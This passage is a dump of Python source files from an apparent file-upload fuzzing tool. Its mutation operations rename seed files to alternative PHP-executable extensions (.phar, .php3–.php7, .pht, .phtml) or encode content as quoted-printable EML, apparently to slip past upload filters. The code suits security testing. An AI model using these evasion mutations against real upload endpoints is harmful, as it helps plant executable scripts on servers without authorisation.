'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M06' ,'M07', 'M08', 'M09', 'M10']}#['M01_JPG', 'M01_PNG', 'M01_GIF', 'M01_ZIP', 'M01_TAR_GZ', 'M01_PDF', 'M02_PNG', 'M02_JPG', 'M02_GIF', 'M02_ZIP', 'M02_PDF', 'M08','M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT', 'M07_OTHER', 'M10', 'M04_PHP5'] # ([classname])when this op used for mutation,
10 |                         # operations in this list can be used to extra mutation.
11 |   __resource__ = {""} # ({type:resource filename})
12 |   __seed_dependency__ = __exclusion_op__.keys()#['html'] # seed file dependency for operation
13 | 
14 |   def operation(self, output, seed_file, resource_file=None):
15 |     base_data='''TESTEML
16 | Content-Type: text/html
17 | Content-Transfer-Encoding: quoted-printable
18 | 
19 | '''
20 |     normalstr = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890 \n\t'
21 |     emlenc = lambda x: '='+hex(ord(x))[2:]
22 |     data = ''
23 |     for i in output['content']:
24 |       if i not in normalstr:
25 |         data +=emlenc(i)
26 |       else:
27 |         data += i
28 |     output['content'] = base_data+data
29 |     if output['filename'] != None and len(output['filename']) > 0:
30 |       filename = output['filename']
31 |     else:
32 |       filename = utils.extract_filename(seed_file)
33 |     #print output['content']
34 |     output['filename'] = filename + '_M6'
35 |     output['fileext'] = 'eml'
36 | 


--------------------------------------------------------------------------------
/mutation_op/m04_phar.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation4: Change Extensions to Mutation Resource File"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M07','M10'],'html':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10'],'xhtml':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10'],'js':['M10','M07','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX']}# ['M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHT', 'M04_PHTML', 'M04_TXT', 'M06', 'M07_PHP', 'M07_OTHER', 'M08', 'M10'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["php","html","js"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |     if output['filename'] != None and len(output['filename']) > 0:
14 |       filename = output['filename']
15 |     else:
16 |       filename = utils.extract_filename(seed_file)
17 | 
18 |     output['filename'] = filename + '_M4PHAR'
19 |     if '.' not in output['fileext']:
20 |       output['fileext'] = 'phar'
21 |     else:
22 |       output['fileext'] = output['fileext'].rsplit('.',1)[0]+'.phar'
23 | 
24 | 


--------------------------------------------------------------------------------
/mutation_op/m04_php3.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation4: Change Extensions to Mutation Resource File"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M07','M10'],'html':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10'],'xhtml':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10'],'js':['M10','M07','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX']}#['M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT', 'M06', 'M07_PHP', 'M07_OTHER', 'M08', 'M10'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["php","html","js"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |     if output['filename'] != None and len(output['filename']) > 0:
14 |       filename = output['filename']
15 |     else:
16 |       filename = utils.extract_filename(seed_file)
17 | 
18 |     output['filename'] = filename + '_M4PHP3'
19 |     if '.' not in output['fileext']:
20 |       output['fileext'] = 'php3'
21 |     else:
22 |       output['fileext'] = output['fileext'].rsplit('.',1)[0]+'.php3'
23 | 
24 | 


--------------------------------------------------------------------------------
/mutation_op/m04_php4.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation4: Change Extensions to Mutation Resource File"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M07','M10'],'html':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10'],'xhtml':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10'],'js':['M10','M07','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX']}#['M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT', 'M06', 'M07_PHP', 'M07_OTHER', 'M08', 'M10'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["php","html","js"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |     if output['filename'] != None and len(output['filename']) > 0:
14 |       filename = output['filename']
15 |     else:
16 |       filename = utils.extract_filename(seed_file)
17 | 
18 |     output['filename'] = filename + '_M4PHP4'
19 |     if '.' not in output['fileext']:
20 |       output['fileext'] = 'php4'
21 |     else:
22 |       output['fileext'] = output['fileext'].rsplit('.',1)[0]+'.php4'
23 | 
24 | 


--------------------------------------------------------------------------------
/mutation_op/m04_php5.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation4: Change Extensions to Mutation Resource File"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M07','M10'],'html':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10'],'xhtml':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10'],'js':['M10','M07','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX']}#['M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT', 'M06', 'M07_PHP', 'M07_OTHER', 'M08', 'M10'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["php","html","js"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |     if output['filename'] != None and len(output['filename']) > 0:
14 |       filename = output['filename']
15 |     else:
16 |       filename = utils.extract_filename(seed_file)
17 | 
18 |     output['filename'] = filename + '_M4PHP5'
19 |     if '.' not in output['fileext']:
20 |       output['fileext'] = 'php5'
21 |     else:
22 |       output['fileext'] = output['fileext'].rsplit('.',1)[0]+'.php5'
23 | 
24 | 


--------------------------------------------------------------------------------
/mutation_op/m04_php7.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation4: Change Extensions to Mutation Resource File"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M07','M10'],'html':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10'],'xhtml':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10'],'js':['M10','M07','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX']}# ['M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT', 'M06', 'M07_PHP', 'M07_OTHER', 'M08', 'M10'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["php","html","js"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |     if output['filename'] != None and len(output['filename']) > 0:
14 |       filename = output['filename']
15 |     else:
16 |       filename = utils.extract_filename(seed_file)
17 | 
18 |     output['filename'] = filename + '_M4PHP7'
19 |     if '.' not in output['fileext']:
20 |       output['fileext'] = 'php7'
21 |     else:
22 |       output['fileext'] = output['fileext'].rsplit('.',1)[0]+'.php7'
23 | 
24 | 


--------------------------------------------------------------------------------
/mutation_op/m04_pht.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation4: Change Extensions to Mutation Resource File"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M07','M10'],'html':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10'],'xhtml':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10'],'js':['M10','M07','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX']}#['M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHTML', 'M04_TXT', 'M06', 'M07_PHP', 'M07_OTHER', 'M08', 'M10'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["php","html","js"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |     if output['filename'] != None and len(output['filename']) > 0:
14 |       filename = output['filename']
15 |     else:
16 |       filename = utils.extract_filename(seed_file)
17 | 
18 |     output['filename'] = filename + '_M4PHT'
19 |     if '.' not in output['fileext']:
20 |       output['fileext'] = 'pht'
21 |     else:
22 |       output['fileext'] = output['fileext'].rsplit('.',1)[0]+'.pht'
23 | 
24 | 


--------------------------------------------------------------------------------
/mutation_op/m04_phtml.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation4: Change Extensions to Mutation Resource File"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M07','M10'],'html':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10'],'xhtml':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10'],'js':['M10','M07','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 